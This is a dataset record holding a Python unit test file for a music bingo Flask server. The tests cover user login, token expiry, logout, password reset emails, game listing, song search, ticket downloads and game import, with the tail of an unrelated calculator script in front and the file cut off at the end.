value=True)\r\ndpg.setup_dearpygui()\r\ndpg.show_viewport()\r\ndpg.start_dearpygui()\r\ndpg.destroy_context()","repo_name":"BadRedCrab/SatisfactoryCalculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"28821293236","text":"\"\"\"\nTest user managerment server APIs\n\"\"\"\n\nimport copy\nimport ctypes\nfrom datetime import datetime, timedelta\nfrom functools import wraps\nimport json\nimport logging\nfrom pathlib import Path\nimport multiprocessing\nimport re\nimport shutil\nimport tempfile\nfrom typing import List, Optional, Set, cast\nimport unittest\nfrom unittest import mock\n\nfrom flask_testing import TestCase # type: ignore\nfrom freezegun import freeze_time # type: ignore\nimport requests\nfrom sqlalchemy import create_engine # type: ignore\nimport tinycss2 # type: ignore\n\nfrom musicbingo import models\nfrom musicbingo.options import DatabaseOptions, Options\nfrom musicbingo.options.extra import ExtraOptions\nfrom musicbingo.json_object import JsonObject\nfrom musicbingo.palette import Palette\nfrom musicbingo.progress import Progress\nfrom musicbingo.models.db import DatabaseConnection\nfrom musicbingo.models.group import Group\nfrom musicbingo.models.importer import Importer\nfrom musicbingo.models.user import User\nfrom musicbingo.server.app import create_app\nfrom musicbingo.server.api import SettingsApi\n\nfrom .config import AppConfig\nfrom .fixture import fixture_filename\nfrom .liveserver import LiveServerTestCase\nfrom .multipart_parser import MultipartMixedParser\nfrom .test_models import ModelsUnitTest\n\nDatabaseOptions.DEFAULT_FILENAME = None\nOptions.INI_FILENAME = None\n\nclass ServerBaseTestCase(TestCase):\n \"\"\" Base Tests \"\"\"\n\n def create_app(self):\n log_format = \"%(thread)d %(filename)s:%(lineno)d %(message)s\"\n logging.basicConfig(format=log_format)\n #logging.getLogger().setLevel(logging.DEBUG)\n #logging.getLogger(models.db.__name__).setLevel(logging.DEBUG)\n options = Options(database_provider='sqlite',\n database_name=':memory:',\n debug=False,\n smtp_server='unit.test',\n smtp_sender='sender@unit.test',\n smtp_reply_to='reply_to@unit.test',\n smtp_username='email',\n smtp_password='secret',\n smtp_starttls=False)\n fixtures = Path(__file__).parent / \"fixtures\"\n templates = Path(__file__).parent / \"..\" / \"server\" / \"templates\"\n return create_app('musicbingo.tests.config.AppConfig',\n options,\n static_folder=fixtures.resolve(),\n template_folder=templates.resolve())\n\n def setUp(self) -> None:\n # self.freezer = freeze_time(\"2020-01-02 03:04:05\")\n # self.freezer.start()\n DatabaseConnection.bind(self.options().database)\n\n def tearDown(self) -> None:\n DatabaseConnection.close()\n # self.freezer.stop()\n\n def options(self) -> Options:\n \"\"\"\n get the Options object associated with the Flask app\n \"\"\"\n return self.app.config['GAME_OPTIONS']\n\n @staticmethod\n def add_user(session, username, email, password, groups_mask=Group.USERS.value) -> User:\n \"\"\"\n Add a user to database\n \"\"\"\n user = User(\n username=username,\n password=User.hash_password(password),\n email=email,\n groups_mask=groups_mask,\n )\n session.add(user)\n session.flush()\n return user\n\n def login_user(self, username, password, rememberme=False):\n \"\"\"\n Call login REST API\n \"\"\"\n return self.client.post(\n '/api/user',\n data=json.dumps({\n 'username': username,\n 'password': password,\n 'rememberme': rememberme\n }),\n content_type='application/json',\n )\n\n def logout_user(self, access_token: str):\n \"\"\"\n Call logout REST API\n \"\"\"\n return self.client.delete(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n\n def register_user(self, username, email, password):\n \"\"\"\n Call register user REST API\n \"\"\"\n return self.client.put(\n '/api/user',\n data=json.dumps({\n 'username': username,\n 'password': password,\n 'email': email,\n }),\n content_type='application/json',\n )\n\n def refresh_access_token(self, refresh_token):\n \"\"\"\n Get a new access token using the refresh token\n \"\"\"\n return self.client.post(\n '/api/refresh',\n headers={\n \"Authorization\": f'Bearer {refresh_token}',\n }\n )\n\n # pylint: disable=invalid-name\n def assertNoCache(self, response):\n \"\"\"\n Assert that \"do not cache\" headers were set in response\n \"\"\"\n self.assertEqual(response.cache_control.max_age, 0)\n self.assertTrue(response.cache_control.no_cache)\n self.assertTrue(response.cache_control.no_store)\n self.assertTrue(response.cache_control.must_revalidate)\n\ndef freeze(time_str: str):\n \"\"\"\n Decorator for mocking datetime using freezegun\n \"\"\"\n def wrapper(func):\n @wraps(func)\n def decorated_function(*args, **kwargs):\n with freeze_time(time_str) as frozen_time:\n return func(*args, frozen_time, **kwargs)\n return decorated_function\n return wrapper\n\n\nclass TestUserApi(ServerBaseTestCase):\n \"\"\"\n Test user managerment server APIs\n \"\"\"\n\n render_templates = True\n\n @freeze(\"2020-01-02 03:04:05\")\n @models.db.db_session\n def test_log_in_using_username(self, frozen_time, dbs):\n \"\"\"Test log in of a registered user using username\"\"\"\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['username'], 'user')\n self.assertEqual(data['email'], 'user@unit.test')\n self.assertEqual(data['groups'], ['users'])\n self.assertIn('accessToken', data)\n self.assertIn('refreshToken', data)\n self.assertIn('options', data)\n options = self.options()\n self.assertEqual(data['options']['colourScheme'],\n options.colour_scheme.name.lower())\n self.assertEqual(data['options']['maxTickets'], options.max_tickets_per_user)\n self.assertEqual(data['options']['rows'], options.rows)\n self.assertEqual(data['options']['columns'], options.columns)\n access_token = data['accessToken']\n refresh_token = data['refreshToken']\n frozen_time.tick(delta=timedelta(seconds=(AppConfig.JWT_ACCESS_TOKEN_EXPIRES / 2)))\n with self.client:\n response = self.client.get(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assertNoCache(response)\n self.assertEqual(data['username'], 'user')\n self.assertEqual(data['email'], 'user@unit.test')\n # check that a 401 response is returned once the access token has expired\n frozen_time.tick(delta=timedelta(seconds=(AppConfig.JWT_ACCESS_TOKEN_EXPIRES / 2)))\n frozen_time.tick(delta=timedelta(seconds=1))\n with self.client:\n response = self.client.get(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n with self.client:\n response = self.client.post(\n '/api/refresh',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n with self.client:\n response = self.refresh_access_token(refresh_token)\n self.assert200(response)\n self.assertNoCache(response)\n self.assertIn('accessToken', response.json)\n # pylint: disable=no-member\n access_token = response.json['accessToken']\n with self.client:\n response = self.client.get(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n options = self.options()\n expected = {\n 'pk': 1,\n 'username': 'user',\n 'email': 'user@unit.test',\n 'groups': ['users'],\n 'options': {\n 'colourScheme': options.colour_scheme.name.lower(),\n 'colourSchemes': [name.lower() for name in Palette.names()],\n 'columns': options.columns,\n 'maxTickets': options.max_tickets_per_user,\n 'rows': options.rows\n },\n 'last_login': '2020-01-02T03:04:05Z',\n 'reset_expires': None,\n 'reset_token': None\n }\n self.maxDiff = None # pylint: disable=attribute-defined-outside-init\n self.assertEqual(data, expected)\n\n @models.db.db_session\n def test_log_in_using_email(self, dbs):\n \"\"\"Test log in of a registered user using email\"\"\"\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.login_user('user@unit.test', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n data = json.loads(response.data.decode())\n self.assertEqual(data['username'], 'user')\n self.assertEqual(data['email'], 'user@unit.test')\n self.assertEqual(data['groups'], ['users'])\n self.assertIn('accessToken', data)\n self.assertIn('refreshToken', data)\n self.assertIn('options', data)\n self.assertEqual(data['options']['colourScheme'],\n self.options().colour_scheme.name.lower())\n self.assertEqual(data['options']['maxTickets'], self.options().max_tickets_per_user)\n self.assertEqual(data['options']['rows'], self.options().rows)\n self.assertEqual(data['options']['columns'], self.options().columns)\n\n def test_log_in_wrong_password(self):\n \"\"\"Test log in of a registered user but wrong password\"\"\"\n with models.db.session_scope() as dbs:\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.login_user('user', 'wrong-password')\n self.assert401(response)\n self.assertNoCache(response)\n\n def test_log_in_unknown_user(self):\n \"\"\"\n Test attempt to log in with unknown user\n \"\"\"\n with models.db.session_scope() as dbs:\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.login_user('notregistered', 'mysecret')\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n\n def test_log_register_new_user(self):\n \"\"\"Test creation of a new user\"\"\"\n with self.client:\n response = self.register_user('newuser', 'user@unit.test', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n data = json.loads(response.data.decode())\n self.assertTrue(data['success'])\n user = data['user']\n self.assertEqual(user['username'], 'newuser')\n self.assertEqual(user['email'], 'user@unit.test')\n self.assertEqual(user['groups'], ['users'])\n self.assertIn('accessToken', data)\n self.assertIn('refreshToken', data)\n self.assertIn('options', user)\n self.assertEqual(user['options']['colourScheme'],\n self.options().colour_scheme.name.lower())\n self.assertEqual(user['options']['maxTickets'], self.options().max_tickets_per_user)\n self.assertEqual(user['options']['rows'], self.options().rows)\n self.assertEqual(user['options']['columns'], self.options().columns)\n\n def test_log_register_new_user_missing_field(self):\n \"\"\"Test creation of a new user where request missing data\"\"\"\n # email address is missing\n data = {\n 'username': 'newuser',\n 'password': 'secure',\n 'email': 'user@unit.test'\n }\n for field in ['username', 'password', 'email']:\n data2 = copy.copy(data)\n del data2[field]\n with self.client:\n response = self.client.put(\n '/api/user',\n data=json.dumps(data2),\n content_type='application/json',\n )\n self.assert400(response)\n self.assertNoCache(response)\n\n @freeze(\"2020-01-02 03:04:05\")\n @models.db.db_session\n def test_logout(self, frozen_time, dbs):\n \"\"\"\n Test log out of a registered user\n \"\"\"\n user = self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n user_pk = user.pk\n del user\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['username'], 'user')\n self.assertEqual(data['email'], 'user@unit.test')\n self.assertIn('accessToken', data)\n access_token = data['accessToken']\n refresh_token = data['refreshToken']\n self.assertEqual(user_pk, data['pk'])\n # check that only the refresh token has been added to the database\n tokens = dbs.query(models.Token).filter_by(user_pk=user_pk)\n self.assertEqual(tokens.count(), 1)\n self.assertEqual(tokens[0].token_type, models.TokenType.REFRESH.value)\n with self.client:\n response = self.client.get(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.assertEqual(data['username'], 'user')\n self.assertEqual(data['email'], 'user@unit.test')\n with self.client:\n response = self.client.delete(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n with self.client:\n response = self.client.get(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n tokens = dbs.query(models.Token).filter_by(user_pk=user_pk)\n self.assertEqual(tokens.count(), 2)\n for token in tokens:\n self.assertTrue(token.revoked)\n # check that refresh token is no longer usable\n with self.client:\n response = self.refresh_access_token(refresh_token)\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n models.Token.prune_database(dbs)\n tokens = dbs.query(models.Token).filter_by(user_pk=user_pk)\n self.assertEqual(tokens.count(), 2)\n frozen_time.tick(delta=timedelta(seconds=(AppConfig.JWT_ACCESS_TOKEN_EXPIRES + 1)))\n models.Token.prune_database(dbs)\n # access token should have been removed from db\n tokens = dbs.query(models.Token).filter_by(user_pk=user_pk)\n self.assertEqual(tokens.count(), 1)\n frozen_time.tick(delta=timedelta(days=1, seconds=2))\n models.Token.prune_database(dbs)\n # refresh token should have been removed from db\n tokens = dbs.query(models.Token).filter_by(user_pk=user_pk)\n self.assertEqual(tokens.count(), 0)\n\n @freeze(\"2020-01-02 03:04:05\")\n @mock.patch('musicbingo.server.api.smtplib.SMTP_SSL', autospec=True)\n def test_password_reset(self, frozen_time, mock_smtp):\n \"\"\"\n Test password reset of a registered user.\n It should send an email to the requested user that contains\n a reset link. The email will contain both a plain text and\n an HTML version.\n \"\"\"\n with models.db.session_scope() as dbs:\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.client.post(\n '/api/user/reset',\n data=json.dumps({\n 'email': 'user@unit.test',\n }),\n content_type='application/json',\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['success'], True, data)\n smtp_opts = self.options().smtp\n mock_smtp.assert_called_once_with(smtp_opts.server, smtp_opts.port, context=mock.ANY)\n context = mock_smtp.return_value.__enter__.return_value\n context.ehlo_or_helo_if_needed.assert_called()\n context.login.assert_called_once_with(smtp_opts.username, smtp_opts.password)\n context.send_message.assert_called_once_with(mock.ANY, smtp_opts.sender, 'user@unit.test')\n args, _ = context.send_message.call_args\n message = args[0]\n self.assertTrue(message.is_multipart())\n self.assertEqual(message.get(\"To\"), 'user@unit.test')\n self.assertEqual(message.get(\"From\"), smtp_opts.sender)\n plain = message.get_payload(0)\n html = message.get_payload(1)\n with self.assertRaises(IndexError):\n _ = message.get_payload(2)\n self.assertEqual(plain.get_content_type(), 'text/plain')\n self.assertEqual(html.get_content_type(), 'text/html')\n token_lifetime = self.app.config['PASSWORD_RESET_TOKEN_EXPIRES']\n with models.db.session_scope() as dbs:\n user = models.User.get(dbs, email='user@unit.test')\n self.assertIsNotNone(user.reset_expires)\n self.assertIsNotNone(user.reset_token)\n self.assertEqual(user.reset_expires, datetime.now() + token_lifetime)\n reset_token = user.reset_token\n reset_url = f'http://localhost/user/reset/{reset_token}'\n self.assertIn(reset_url, str(plain))\n self.assertIn(smtp_opts.reply_to, str(plain))\n self.assertIn(reset_url, str(html))\n self.assertIn(smtp_opts.reply_to, str(html))\n frozen_time.tick(timedelta(seconds=(token_lifetime.total_seconds() - 10)))\n with self.client:\n response = self.client.post(\n '/api/user/reset',\n data=json.dumps({\n 'email': 'user@unit.test',\n 'token': reset_token,\n 'password': 'newpassword',\n 'confirmPassword': 'newpassword',\n }),\n content_type='application/json',\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['success'], True)\n with models.db.session_scope() as dbs:\n user = models.User.get(dbs, email='user@unit.test')\n self.assertTrue(user.check_password('newpassword'))\n self.assertIsNone(user.reset_expires)\n self.assertIsNone(user.reset_token)\n\n\n @models.db.db_session\n def test_password_reset_missing_smtp_settings(self, dbs):\n \"\"\"\n Test password reset where SMTP settings have not been provided.\n It should detect the missing setting and include it in an\n error message to the client.\n \"\"\"\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n orig_opts = self.options().smtp.to_dict()\n smtp_settings = ['server', 'port', 'sender', 'username', 'password']\n for option in smtp_settings:\n # restore SMTP settings before test\n for opt in smtp_settings:\n setattr(self.options().smtp, opt, orig_opts[opt])\n setattr(self.options().smtp, option, None)\n with self.client:\n response = self.client.post(\n '/api/user/reset',\n data=json.dumps({\n 'email': 'user@unit.test',\n }),\n content_type='application/json',\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n msg = f'Should fail if {option} setting is missing'\n self.assertEqual(data['success'], False, msg)\n self.assertIn('Invalid SMTP settings', data['error'], msg)\n\n @models.db.db_session\n @mock.patch('musicbingo.server.api.smtplib.SMTP_SSL', autospec=True)\n def test_password_reset_unknown_email_address(self, dbs, mock_smtp):\n \"\"\"\n Test password reset using an unknown email address.\n It should return \"success: True\" to the client but not\n send an email.\n \"\"\"\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.client.post(\n '/api/user/reset',\n data=json.dumps({\n 'email': 'unknown@unit.test',\n }),\n content_type='application/json',\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['success'], True)\n mock_smtp.assert_not_called()\n\n @freeze(\"2020-01-02 03:04:05\")\n def test_password_reset_link_expires(self, frozen_time):\n \"\"\"\n Test that password reset link stops working when token has expired\n \"\"\"\n with models.db.session_scope() as dbs:\n user = self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n user.reset_token = 'abc123'\n user.reset_expires = datetime.now() + timedelta(seconds=60)\n frozen_time.tick(delta=timedelta(seconds=61))\n with self.client:\n response = self.client.post(\n '/api/user/reset',\n data=json.dumps({\n 'email': 'user@unit.test',\n 'token': 'abc123',\n 'password': 'newpassword',\n 'confirmPassword': 'newpassword',\n }),\n content_type='application/json',\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['success'], False)\n with models.db.session_scope() as dbs:\n user = models.User.get(dbs, email='user@unit.test')\n self.assertTrue(user.check_password('mysecret'))\n self.assertIsNotNone(user.reset_expires)\n self.assertIsNotNone(user.reset_token)\n\n def test_password_reset_link_cleared_after_login(self):\n \"\"\"\n Test that password reset token is removed after successful login\n \"\"\"\n with models.db.session_scope() as dbs:\n user = self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n user.reset_token = 'abc123'\n user.reset_expires = datetime.now() + timedelta(seconds=60)\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n with models.db.session_scope() as dbs:\n user = models.User.get(dbs, email='user@unit.test')\n self.assertTrue(user.check_password('mysecret'))\n self.assertIsNone(user.reset_expires)\n self.assertIsNone(user.reset_token)\n\nclass TestListGamesApi(ServerBaseTestCase):\n \"\"\"\n Test game list server APIs\n \"\"\"\n def setUp(self):\n super().setUp()\n json_filename = fixture_filename(\"tv-themes-v4.json\")\n with models.db.session_scope() as dbs:\n imp = Importer(self.options(), dbs, Progress())\n imp.import_database(json_filename)\n\n @freeze(\"2020-04-24 03:04:05\")\n def test_game_list(self, frozen_time):\n \"\"\"\n Test get list of past and present games\n \"\"\"\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n expected = {\n \"games\": [\n {\n \"pk\": 1,\n \"id\": \"20-04-24-2\",\n \"title\": \"TV Themes\",\n \"start\": \"2020-04-24T18:05:44.048300Z\",\n \"end\": \"2020-08-02T18:05:44.048300Z\",\n \"options\": {\n 'cards_per_page': 3,\n 'checkbox': False,\n 'colour_scheme': 'blue',\n 'number_of_cards': 24,\n 'include_artist': True,\n 'columns': 5,\n 'rows': 3,\n 'page_size': 'A4',\n 'sort_order': 'interleave',\n 'backgrounds': [\n '#daedff', '#f0f8ff', '#daedff', '#f0f8ff', '#daedff',\n '#f0f8ff', '#daedff', '#f0f8ff', '#daedff', '#f0f8ff',\n '#daedff', '#f0f8ff', '#daedff', '#f0f8ff', '#daedff'\n ]\n },\n \"userCount\": 0\n }\n ],\n \"past\": []\n }\n with self.client:\n response = self.client.get(\n '/api/games',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.maxDiff = None # pylint: disable=attribute-defined-outside-init\n self.assertDictEqual(response.json, expected)\n frozen_time.move_to(datetime(year=2020, month=8, day=3))\n expected[\"past\"] = expected[\"games\"]\n expected[\"games\"] = []\n # login required as both access token and refresh token will have expired\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n with self.client:\n response = self.client.get(\n '/api/games',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.maxDiff = None # pylint: disable=attribute-defined-outside-init\n self.assertDictEqual(response.json, expected)\n\n\nclass TestQuerySongsApi(ServerBaseTestCase, ModelsUnitTest):\n \"\"\"\n Test song list and query API\n \"\"\"\n def setUp(self):\n sql_filename = fixture_filename(\"tv-themes-v5.sql\")\n engine = create_engine(self.options().database.connection_string())\n self.load_fixture(engine, sql_filename)\n DatabaseConnection.bind(self.options().database, create_tables=False,\n engine=engine)\n\n def test_song_query(self):\n \"\"\"\n Test get list of matching songs\n \"\"\"\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n expected = [{\n 'pk': 1,\n 'filename': '01-25- Ghostbusters.mp3',\n 'title': 'Ghostbusters',\n 'duration': 30016,\n 'channels': 2,\n 'sample_rate': 44100,\n 'sample_width': 16,\n 'bitrate': 256,\n 'uuid': 'urn:uuid:7dcc81f2-5dbe-5973-9556-494d94cf0f77',\n 'directory': 1,\n 'artist': 'Ray Parker Jr',\n 'album': '100 Hits 80s Essentials'\n }, {\n 'pk': 24,\n 'filename': '18 Blockbusters.mp3',\n 'title': 'Blockbusters',\n 'duration': 30016,\n 'channels': 2,\n 'sample_rate': 44100,\n 'sample_width': 16,\n 'bitrate': 256,\n 'uuid': 'urn:uuid:ba5a0f66-e319-5dd3-ab3e-00f0ccd61cc8',\n 'directory': 1,\n 'artist': 'Gordon Lorenz Orchestra',\n 'album': 'Your 101 All Time Favourite TV Themes'\n }]\n with self.client:\n response = self.client.get(\n '/api/song?q=bus',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n # self.maxDiff = None\n self.assertListEqual(response.json, expected)\n expected = [{\n 'pk': 14,\n 'filename': '10 The Six Million Dollar Man.mp3',\n 'title': 'The Six Million Dollar Man',\n 'duration': 30016,\n 'channels': 2,\n 'sample_rate': 44100,\n 'sample_width': 16,\n 'bitrate': 256,\n 'uuid': 'urn:uuid:2b566ec7-f11b-5d96-82ad-f1bc6cb9b485',\n 'directory': 1,\n 'artist': 'Dusty Springfield',\n 'album': 'All-Time Top 100 TV Themes [Disc 2]'\n }]\n with self.client:\n response = self.client.get(\n '/api/song?q=spring',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.assertListEqual(response.json, expected)\n\n\nclass TestDownloadTicketView(ServerBaseTestCase, ModelsUnitTest):\n \"\"\"\n Test downloading PDF of a ticket\n \"\"\"\n def setUp(self):\n sql_filename = fixture_filename(\"tv-themes-v5.sql\")\n engine = create_engine(self.options().database.connection_string())\n self.load_fixture(engine, sql_filename)\n DatabaseConnection.bind(self.options().database, create_tables=False,\n engine=engine)\n\n def test_download_claimed_ticket(self):\n \"\"\"\n Test get a PDF of a ticket that has been claimed by the user\n \"\"\"\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n # assign ticket 23 to this user\n with models.db.session_scope() as dbs:\n game = models.Game.get(dbs, id='20-04-24-2')\n self.assertIsNotNone(game)\n game_pk = game.pk\n ticket = models.BingoTicket.get(dbs, game=game, number=23)\n ticket_pk = ticket.pk\n self.assertIsNotNone(ticket)\n user = models.User.get(dbs, username='user')\n self.assertIsNotNone(user)\n ticket.user = user\n dbs.flush()\n with self.client:\n response = self.client.get(\n f'/api/game/{game_pk}/ticket/ticket-{ticket_pk}.pdf',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.assertEqual(response.headers['Content-Type'], 'application/pdf')\n self.assertEqual(response.headers['Content-Disposition'],\n 'attachment; filename=\"Game 20-04-24-2 ticket 23.pdf\"')\n\n def test_download_unclaimed_ticket(self):\n \"\"\"\n Test that trying to get a PDF of a ticket that has not been claimed by the user\n fails.\n \"\"\"\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n with self.client:\n response = self.client.get(\n '/api/game/1/ticket/ticket-21.pdf',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert401(response)\n\n def test_host_download_ticket(self):\n \"\"\"\n Test that a host can download any ticket\n \"\"\"\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n with models.db.session_scope() as dbs:\n user = models.User.get(dbs, username='user')\n self.assertIsNotNone(user)\n user.set_groups(['users', 'hosts'])\n with self.client:\n response = self.client.get(\n '/api/game/1/ticket/ticket-21.pdf',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.assertEqual(response.headers['Content-Type'], 'application/pdf')\n self.assertEqual(response.headers['Content-Disposition'],\n 'attachment; filename=\"Game 20-04-24-2 ticket 23.pdf\"')\n\n\nclass ServerTestCaseBase(LiveServerTestCase, ModelsUnitTest):\n \"\"\"\n Base class for test cases that need to use a live HTTP server\n \"\"\"\n LIVESERVER_TIMEOUT: int = 15\n FIXTURE: Optional[str] = \"tv-themes-v5.sql\"\n\n _temp_dir = multiprocessing.Array(ctypes.c_char, 1024)\n\n def create_app(self):\n log_format = \"%(thread)d %(filename)s:%(lineno)d %(message)s\"\n logging.basicConfig(format=log_format)\n # logging.getLogger().setLevel(logging.DEBUG)\n # logging.getLogger(models.db.__name__).setLevel(logging.DEBUG)\n tempdir = tempfile.mkdtemp()\n self._temp_dir.value = bytes(tempdir, 'utf-8')\n options = Options(database_provider='sqlite',\n database_name=f'{tempdir}/bingo.db3',\n debug=False,\n smtp_server='unit.test',\n smtp_sender='sender@unit.test',\n smtp_reply_to='reply_to@unit.test',\n smtp_username='email',\n smtp_password='secret',\n smtp_starttls=False)\n engine = create_engine(options.database.connection_string())\n if self.FIXTURE is not None:\n self.load_fixture(engine, self.FIXTURE)\n #json_filename = fixture_filename(self.FIXTURE)\n #with models.db.session_scope() as dbs:\n # imp = Importer(options, dbs, Progress())\n # imp.import_database(json_filename)\n DatabaseConnection.bind(options.database, create_tables=False,\n engine=engine)\n fixtures = Path(__file__).parent / \"fixtures\"\n return create_app(AppConfig, options, static_folder=fixtures,\n template_folder=fixtures)\n\n def setUp(self):\n self.session = requests.Session()\n\n def tearDown(self):\n self.session.close()\n self._terminate_live_server()\n DatabaseConnection.close()\n if self._temp_dir.value:\n shutil.rmtree(self._temp_dir.value)\n\n def login_user(self, username, password, rememberme=False):\n \"\"\"\n Call login REST API\n \"\"\"\n api_url = self.get_server_url()\n return self.session.post(\n f'{api_url}/api/user',\n data=json.dumps({\n 'username': username,\n 'password': password,\n 'rememberme': rememberme\n }),\n headers={\n \"content-type\": 'application/json',\n }\n )\n\nclass TestImportGame(ServerTestCaseBase):\n \"\"\"\n Test importing games into database\n \"\"\"\n def test_import_not_admin(self):\n \"\"\"\n Test import of gameTracks file when not an admin\n \"\"\"\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json()['accessToken']\n json_filename = fixture_filename(\"gameTracks-v3.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n data = json.load(src)\n api_url = self.get_server_url()\n response = self.session.put(\n f'{api_url}/api/games',\n json={\n \"filename\": \"game-20-01-02-1.json\",\n \"data\": data\n },\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"content-type\": 'application/json',\n }\n )\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n # force reading of data from server\n response.raw.read()\n\n def test_import_v3_game(self):\n \"\"\"\n Test import of a v3 gameTracks file\n \"\"\"\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json()['accessToken']\n json_filename = fixture_filename(\"gameTracks-v3.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n data = json.load(src)\n api_url = self.get_server_url()\n response = self.session.put(\n f'{api_url}/api/games',\n json={\n \"filename\": \"game-20-01-02-1.json\",\n \"data\": data\n },\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"Accept\": 'application/json',\n \"content-type\": 'application/json',\n },\n stream=True\n )\n self.assert200(response)\n self.assertNoCache(response)\n content_type = response.headers['Content-Type']\n self.assertTrue(content_type.startswith('multipart/'))\n pos = content_type.index('; boundary=')\n boundary = content_type[pos + len('; boundary='):]\n parser = MultipartMixedParser(bytes(boundary, 'utf-8'), response)\n for part in parser.parse():\n data = json.loads(part)\n if data['done']:\n expected = {\n 'done': True,\n 'errors': [],\n 'success': True,\n 'added': {\n \"User\": 0,\n \"Directory\": 2,\n \"Album\": 1,\n \"Artist\": 34,\n \"Song\": 40,\n \"Track\": 40,\n \"BingoTicket\": 24,\n \"Game\": 1\n },\n 'keys': data['keys'],\n 'text': 'Import complete',\n 'pct': 100.0,\n 'phase': 7,\n 'numPhases': 8,\n }\n # print(data)\n # print(expected)\n self.assertDictEqual(data, expected)\n\n def test_import_not_gametracks_file(self):\n \"\"\"\n Test import of a JSON file that is not a gameTracks file\n \"\"\"\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json()['accessToken']\n json_filename = fixture_filename(\"tv-themes-v4.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n data = json.load(src)\n api_url = self.get_server_url()\n response = self.session.put(\n f'{api_url}/api/games',\n json={\n \"filename\": \"game-20-01-02-1.json\",\n \"data\": data\n },\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"Accept\": 'application/json',\n \"content-type\": 'application/json',\n },\n stream=True\n )\n self.assert200(response)\n self.assertNoCache(response)\n content_type = response.headers['Content-Type']\n self.assertTrue(content_type.startswith('multipart/'))\n pos = content_type.index('; boundary=')\n boundary = content_type[pos + len('; boundary='):]\n parser = MultipartMixedParser(bytes(boundary, 'utf-8'), response)\n expected = {\n 'errors': [\n 'Not a valid gameTracks file',\n 'data must be valid exactly by one of oneOf definition'\n ],\n 